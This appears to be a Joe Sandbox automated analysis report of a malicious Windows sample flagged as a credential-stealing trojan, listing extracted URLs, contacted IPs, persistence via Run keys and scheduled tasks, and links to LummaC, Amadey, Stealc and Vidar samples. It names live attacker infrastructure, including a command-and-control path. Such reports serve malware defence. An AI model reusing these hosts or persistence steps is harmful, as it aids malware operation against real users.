https://www.zhihu.com/	firefox.exe, 00000017.00000002.2701121751.0000013254E56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2814498844.00000287195E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	firefox.exe, 00000017.00000002.2701121751.0000013254EC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2656770840.000001324EDF8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	firefox.exe, 00000017.00000002.2701121751.0000013254EC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2656770840.000001324EDF8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://infra.spec.whatwg.org/#ascii-whitespace	firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored	firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.adsafeprotected.com/firefox-etp-pixelcolor-mix(in	firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeshttps://support.mozilla.org	firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2628867564.000001324B254000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2626803778.000001324A61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621608217.0000013248F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2521738346.000001324A633000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile.services.mozilla.com/v1/tiles	firefox.exe, 00000017.00000002.2657935720.000001324EE0A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2701121751.0000013254E88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://www.amazon.co.uk/	firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/user/preferences	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://screenshots.firefox.com/	firefox.exe, 00000017.00000003.2520315947.000001324CD7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gpuweb.github.io/gpuweb/	firefox.exe, 00000017.00000002.2701121751.0000013254E5C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://firefox-source-docs.mozilla.org/remote/Security.html	firefox.exe, 00000017.00000002.2622599068.0000013249326000.00000004.00000800.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/usergetValue/preffedBlockRegions	firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://e.mail.ru/cgi-bin/sentmsg?mailto=%sextractScheme/fixupChangedProtocol	firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.wykop.pl/	firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	false		high
https://vk.com/	firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying	firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.olx.pl/	firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.2814498844.00000287195E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://effecterectz.xyz/api	PK13K1G.exe, 00000008.00000003.2500719832.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2562292696.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2555567301.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2500389249.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://mail.google.com/mail/?extsrc=mailto&url=%sFailed	firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://xhr.spec.whatwg.org/#sync-warningThe	firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	false		high
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4	firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2	firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/website-translationaccount-send-tab-to-device-singledevice-learnmore_	firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/google/closure-compiler/issues/3177	firefox.exe, 00000017.00000002.2703429736.0000013254F12000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.steampowered.com/	PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/mobile	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.181.132	www.google.com	United States	15169	GOOGLEUS	false
104.21.22.222	immureprech.biz	United States	13335	CLOUDFLARENETUS	false
34.117.188.166	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
104.21.96.1	deafeninggeh.biz	United States	13335	CLOUDFLARENETUS	false
23.55.153.106	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	false
34.120.208.123	telemetry-incoming.r53-2.services.mozilla.com	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
34.149.100.209	prod.remote-settings.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
34.107.243.93	push.services.mozilla.com	United States	15169	GOOGLEUS	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
151.101.193.91	services.addons.mozilla.org	United States	54113	FASTLYUS	false
104.21.67.145	bellflamre.click	United States	13335	CLOUDFLARENETUS	true
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
142.250.181.78	youtube.com	United States	15169	GOOGLEUS	false
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575093
Start date and time:	2024-12-14 12:54:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 19m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	60
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@116/34@153/22
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 54% Number of executed functions: 116 Number of non-executed functions: 223
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 142.250.181.99, 64.233.164.84, 172.217.19.206, 142.250.181.142, 142.250.181.3, 44.228.225.150, 54.213.181.160, 35.85.93.176, 142.250.181.106, 142.250.181.74, 172.217.17.78, 142.250.181.138, 172.217.17.74, 172.217.19.202, 172.217.19.10, 172.217.19.170, 172.217.19.234, 142.250.181.10, 172.217.17.42, 142.250.181.42, 23.210.249.26, 23.210.249.90, 13.89.179.12, 172.217.17.46, 20.12.23.50, 13.107.246.63, 2.16.229.162, 20.190.147.10, 52.168.112.67
Excluded domains from analysis (whitelisted): dare-curbys.biz, impend-differ.biz, ciscobinary.openh264.org, slscr.update.microsoft.com, incoming.telemetry.mozilla.org, clientservices.googleapis.com, a17.rackcdn.com.mdc.edgesuite.net, aus5.mozilla.org, covery-mover.biz, onedsblobprdcus17.centralus.cloudapp.azure.com, a19.dscg10.akamai.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, safebrowsing.googleapis.com, dwell-exclaim.biz, www.gstatic.com, normandy-cdn.services.mozilla.com, zonedw.sbs, fs.microsoft.com, shavar.prod.mozaws.net, accounts.google.com, otelrules.azureedge.net, self.events.data.microsoft.com, t.me, zinc-sneark.biz, ctldl.windowsupdate.com, ogads-pa.googleapis.com, detectportal.prod.mozaws.net, formy-spill.biz, fe3cr.delivery.mp.microsoft.com, normandy.cdn.mozilla.net, dualstack.reddit.map.fastly.net, se-blurry.biz, blobcollector.events.data.trafficmanager.net, print-vexer.biz, umwatson.events.data.microsoft.com, clients.l.google.com, location.services.mozilla.
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:56:01	API Interceptor	27507736x Sleep call for process: skotes.exe modified
06:56:14	API Interceptor	3x Sleep call for process: PK13K1G.exe modified
06:56:50	API Interceptor	385x Sleep call for process: acdee533dd.exe modified
06:57:27	API Interceptor	1x Sleep call for process: firefox.exe modified
11:55:02	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
11:56:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 8ed1a1ded0.exe C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe
11:56:29	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 8ed1a1ded0.exe C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe
11:56:37	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run acdee533dd.exe C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe
11:56:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run e2def46cb9.exe C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe
11:56:54	Task Scheduler	Run new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
11:56:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run acdee533dd.exe C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe
11:57:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run e2def46cb9.exe C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe
12:00:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run a6d88915ac.exe C:\Users\user\AppData\Local\Temp\1015173001\a6d88915ac.exe
12:00:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 03a85f4f7c.exe C:\Users\user\AppData\Local\Temp\1015174001\03a85f4f7c.exe
12:00:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4d1f3058da.exe C:\Users\user\AppData\Local\Temp\1015175001\4d1f3058da.exe
12:00:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run a6d88915ac.exe C:\Users\user\AppData\Local\Temp\1015173001\a6d88915ac.exe
12:00:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 03a85f4f7c.exe C:\Users\user\AppData\Local\Temp\1015174001\03a85f4f7c.exe
12:01:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4d1f3058da.exe C:\Users\user\AppData\Local\Temp\1015175001\4d1f3058da.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
104.21.22.222	Loader.exe	Get hash	malicious	LummaC	Browse
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse
	adv.ps1	Get hash	malicious	LummaC	Browse
	http://gerxx.ru	Get hash	malicious	Unknown	Browse
	https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20=	Get hash	malicious	HTMLPhisher	Browse
34.117.188.166	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
services.addons.mozilla.org	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	151.101.193.91
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
example.org	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
immureprech.biz	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	172.67.207.38
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	IFTM0g0NWX.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	Download-Roblox-Solara.exe	Get hash	malicious	LummaC	Browse	104.21.22.222
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	adv.ps1	Get hash	malicious	LummaC	Browse	104.21.22.222
	d2W4YpqsKg.lnk	Get hash	malicious	LummaC	Browse	172.67.207.38
	QnNRjhoN.ps1	Get hash	malicious	LummaC	Browse	172.67.207.38
	infrarecorder.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	172.67.207.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	34.117.188.166
	http://home45insurance.blogspot.com	Get hash	malicious	Unknown	Browse	34.117.77.79
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	file.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	172.67.207.38
	https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	104.21.79.7
	https://publuu.com/flip-book/749011/1660718	Get hash	malicious	HTMLPhisher	Browse	104.21.57.204
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.139.78
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.139.78
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.139.78
	https://u13974777.ct.sendgrid.net/ls/click?upn=u001.1GFl1p-2BBYL-2Bhgs5F-2B0NOkrtNxvRU5lHyHn9X7Gay0rMweTw4Bty7YorCE1pBfo679HN2Nod-2BfRWA-2FvzNVU6n0ycgVO9YFLntVOrRszMr10A-3DE-mj_xaXJc0NsC5WAXuVv6HNgzGH9nxkzD8xRdi-2BQVNVTAgV30zfSKc1z4I-2Bc6Qx1hEzdtXusfFTLvSScqQmgK1DgmCe6NsmhCnbLpmZI7EPM56c0IpOXy2jX8FUofqX-2FLwkrDNu-2BJ8VdkhW-2BcibVgB56YvBarWAJ68QdVLDk-2BreYFAbG2RxK5FI2ZOf8OuVaYqzfkm-2FGiI9tY4Y1XN-2FN7Uh8Vtzi-2FP-2B8s9qjOHBuznAYsq-2B4GCewCcJExgcNnMrLH-2B3Pv6vH6wzFQkN2aMTddwwaWvcIkZYQDF7aLn1FYUQMocCkCTJEmkArX-2Bdrge72rYVSFN-2FsI6AAcwN5SA74y-2B4g6Q-3D-3D	Get hash	malicious	Unknown	Browse	104.18.26.193
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	172.67.139.78
	http://vzgb5l.elnk8.com/83885021a686e36f9150aaf51cbc0afdh	Get hash	malicious	Unknown	Browse	104.17.25.14
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	23.55.153.106 104.21.67.145 104.21.22.222 104.21.96.1 104.21.79.7
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	23.55.153.106 104.21.67.145 104.21.22.222 104.21.96.1 104.21.79.7
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	23.55.153.106 104.21.67.145 104.21.22.222 104.21.96.1 104.21.79.7
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	23.55.153.106 104.21.67.145 104.21.22.222 104.21.96.1 104.21.79.7
